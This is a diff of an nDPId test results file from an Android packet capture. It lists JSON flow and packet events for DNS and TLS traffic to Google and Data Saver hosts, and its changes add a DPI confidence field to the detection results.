 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871600,"flow_last_seen":1582454871600,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454871600,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1582454871600,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1582454871600,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBq\/ZAAEARCVTAqAIQwKgCAeYMADUALTc\/5u4BAAABAAAAAAAACGFjY291bnRzBmdvb2dsZQNjb20AAAEAAQ=="}
-00741{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871600,"flow_last_seen":1582454871600,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454871600,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871600,"flow_last_seen":1582454871600,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454871600,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1582454871601,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"ts_msec":1582454871601,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRUPMAAEARpEfAqAIBwKgCEAA15gwAPWHd5u6BgAABAAEAAAAACGFjY291bnRzBmdvb2dsZQNjb20AAAEAAcAMAAEAAQAAANoABNjvJng="}
-00756{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":339,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871600,"flow_last_seen":1582454871601,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454871601,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}}
-00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871553,"flow_last_seen":1582454871614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454871614,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":339,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871600,"flow_last_seen":1582454871601,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454871601,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}}
+00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871553,"flow_last_seen":1582454871614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454871614,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871623,"flow_last_seen":1582454871623,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454871623,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1582454871623,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454871623,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8E0lAAEAGZVPAqAIQ2O8meIDqAbtXpCQEAAAAAKAC\/\/9QRAAAAgQFtAQCCAr\/\/zdNAAAAAAEDAwg="}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1582454871636,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454871636,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8YK4AAHYGIe7Y7yZ4wKgCEAG7gOoEIWijV6QkBaAS6yBQGwAAAgQFZAQCCAqpXP8l\/\/83TQEDAwg="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1582454871641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454871641,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0E0pAAEAGZVrAqAIQ2O8meIDqAbtXpCQFBCFopIAQAVdoXgAAAQEICv\/\/N1GpXP8l"}
-00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":349,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871553,"flow_last_seen":1582454871657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1582454871657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871623,"flow_last_seen":1582454871671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454871671,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00947{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":349,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871553,"flow_last_seen":1582454871657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1582454871657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871623,"flow_last_seen":1582454871671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454871671,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871676,"flow_last_seen":1582454871676,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454871676,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1582454871676,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1582454871676,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBrABAAEARCUrAqAIQwKgCAYHYADUALeidI0IBAAABAAAAAAAABWNoZWNrCWdvb2dsZXppcANuZXQAAAEAAQ=="}
-00737{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871676,"flow_last_seen":1582454871676,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454871676,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871676,"flow_last_seen":1582454871676,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454871676,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1582454871677,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"ts_msec":1582454871677,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRtlYAAEARPuTAqAIBwKgCEAA1gdgAPR0+I0KBgAABAAEAAAAABWNoZWNrCWdvb2dsZXppcANuZXQAAAEAAcAMAAEAAQAAAQMABK3CT3I="}
-00752{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":359,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871676,"flow_last_seen":1582454871677,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454871677,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.79.114"}}
-00926{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":361,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871623,"flow_last_seen":1582454871702,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"ts_msec":1582454871702,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00778{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":359,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871676,"flow_last_seen":1582454871677,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454871677,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.79.114"}}
+00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":361,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871623,"flow_last_seen":1582454871702,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"ts_msec":1582454871702,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871741,"flow_last_seen":1582454871741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454871741,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1582454871741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454871741,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8FotAAEAGoFXAqAIQrNkUSs0iAbsOnCHhAAAAAKAC\/\/+NXgAAAgQFtAQCCAr\/\/zdqAAAAAAEDAwg="}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871745,"flow_last_seen":1582454871745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454871745,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -254,24 +254,24 @@
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1582454871787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454871787,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0bVlAAEAGDX7AqAIQrcJPco\/wAFDXL1o0C99s2YAQAVcQ9wAAAQEICv\/\/N3bQ72G\/"}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":377,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871804,"flow_last_seen":1582454871804,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1582454871804,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1582454871804,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"ts_msec":1582454871804,"pkt":"xiwDYGpkTGr2n\/YnCABFAABGrB5AAEARCSfAqAIQwKgCAUfLADUAMmcLPGQBAAABAAAAAAAACWRhdGFzYXZlcgpnb29nbGVhcGlzA2NvbQAAAQAB"}
-00742{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871804,"flow_last_seen":1582454871804,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1582454871804,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871804,"flow_last_seen":1582454871804,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1582454871804,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1582454871805,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"ts_msec":1582454871805,"pkt":"TGr2n\/YnxiwDYGpkCABFAABWsEQAAEARRPHAqAIBwKgCEAA1R8sAQmKIPGSBgAABAAEAAAAACWRhdGFzYXZlcgpnb29nbGVhcGlzA2NvbQAAAQABwAwAAQABAAABKwAErNkVyg=="}
-00758{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":378,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871804,"flow_last_seen":1582454871805,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1582454871805,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.21.202"}}
+00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":378,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871804,"flow_last_seen":1582454871805,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1582454871805,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.21.202"}}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1582454871807,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454871807,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8DHkAAGcGh1atwk9ywKgCEABQj\/Jn2o0VwtQ8S6AS87jgEAAAAgQFlgQCCArQTChF\/\/83cgEDAwg="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1582454871808,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454871808,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0CzlAAEAGb57AqAIQrcJPco\/yAFDC1DxLZ9qNFoAQAVcBGQAAAQEICv\/\/N3vQTChF"}
